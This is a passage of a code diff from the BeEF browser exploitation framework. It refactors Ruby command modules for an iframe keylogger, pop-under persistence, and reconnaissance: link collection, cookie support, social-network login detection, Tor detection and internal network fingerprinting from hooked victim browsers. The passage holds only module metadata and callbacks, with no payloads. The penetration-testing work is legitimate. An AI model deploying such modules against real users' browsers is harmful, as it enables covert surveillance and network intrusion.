{'name' => 'iFrameSrc', 'ui_label'=>'iFrame Src', 'type' => 'textarea', 'value' =>'/demos/secret_page.html', 'width' => '400px', 'height' => '50px'},
{'name' => 'sendBackInterval', 'ui_label' => 'Send Back Interval (ms)', 'value' => '2000', 'width'=>'100px' }
],
'File' => __FILE__
})
# works in every latest browser (IE8, Firefox 5, Chrome 12, Safari 5) except Opera
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
set_target({
'verified_status' => VERIFIED_NOT_WORKING,
'browser_name' => O
})
use_template!
]
end
def callback
@@ -51,4 +28,4 @@ class Iframe_keylogger < BeEF::Core::Command
save content
end
end
end

23
modules/persistence/popunder_window/module.rb
View File

@@ -15,27 +15,6 @@
#
class Popunder_window < BeEF::Core::Command
#
# Defines and set up the commmand module.
#
def initialize
super({
'Name' => 'Pop Under Window',
'Description' => 'Creates a new discrete pop under window with the beef hook included.<br><br>This module will add another browser node to the tree. It will be a duplicate. This will be addressed in a future release',
'Category' => 'Persistence',
'Author' => 'ethicalhack3r',
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => ALL
})
use_template!
end
# This method is being called when a hooked browser sends some
# data back to the framework.
#
@@ -43,4 +22,4 @@ class Popunder_window < BeEF::Core::Command
save({'result' => @datastore['result']})
end
end
end

20
modules/recon/collect_links/module.rb
View File

@@ -15,26 +15,6 @@
#
class Collect_links < BeEF::Core::Command
def initialize
super({
'Name' => 'Collect Links',
'Description' => %Q{
This module will retrieve HREFs from the target page
},
'Category' => 'Recon',
'Author' => ['vo'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.dom'
use_template!
end
def callback
content = {}
content['Links'] = @datastore['links']

25
modules/recon/detect_cookies_support/module.rb
View File

@@ -15,28 +15,11 @@
#
class Detect_cookies_support < BeEF::Core::Command
def initialize
super({
'Name' => 'Detect Cookie Support',
'Description' => %Q{
This module will check if the browser allows a cookie with specified name to be set.
},
'Category' => 'Recon',
'Data' => [
def self.options
return [
{'name' => 'cookie', 'ui_label' => 'Cookie name', 'value' =>'cookie'}
],
'Author' => ['vo'],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.browser.cookie'
use_template!
end
]
end
def callback
content = {}

23
modules/recon/detect_soc_nets/module.rb
View File

@@ -15,25 +15,10 @@
#
class Detect_soc_nets < BeEF::Core::Command
def initialize
super({
'Name' => 'Detect Social Networks',
'Description' => 'This module will detect if the Hooked Browser is currently authenticated to GMail, Facebook and Twitter',
'Category' => 'Recon',
'Author' => ['xntrik', 'Mike Cardwell'],
'Data' => [
def self.options
return [
{'name' => 'timeout', 'ui_label' => 'Detection Timeout','value' => '5000'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.net.local'
use_template!
]
end
def callback
@@ -44,4 +29,4 @@ class Detect_soc_nets < BeEF::Core::Command
save content
end
end
end

23
modules/recon/detect_tor/module.rb
View File

@@ -15,25 +15,10 @@
#
class Detect_tor < BeEF::Core::Command
def initialize
super({
'Name' => 'Detect Tor',
'Description' => 'This module will detect if the zombie is currently using TOR (The Onion Router).',
'Category' => 'Recon',
'Author' => ['pdp', 'wade', 'bm', 'xntrik'],
'Data' => [
def self.options
return [
{'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_WORKING,
'browser_name' => ALL
})
use 'beef.net.local'
use_template!
]
end
def callback
@@ -42,4 +27,4 @@ class Detect_tor < BeEF::Core::Command
save({'result' => @datastore['result']})
end
end
end

32
modules/recon/internal_network_fingerprinting/module.rb
View File

@@ -36,37 +36,11 @@
class Internal_network_fingerprinting < BeEF::Core::Command
def initialize
super({
'Name' => 'Internal Network Fingerprinting',
'Description' => 'Discover devices and applications in the internal network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea). </br>If no IP range or ports are specified, the default device (after a default install) IP/port will be used.</br>Only successfully discovered devices/applications will be shown in the command results.',
'Category' => 'Recon',
'Author' => ['bcoles@gmail.com', 'wade', 'antisnatchor'],
'Data' => [
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'ports', 'ui_label' => 'Ports to test', 'value' => '80,8080'}
],
'File' => __FILE__
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => FF # works also in FF 4.0.1
})
set_target({
'verified_status' => VERIFIED_NOT_WORKING,
'browser_name' => O
})
set_target({
'verified_status' => VERIFIED_USER_NOTIFY,
'browser_name' => IE
})
use_template!
]
end
def callback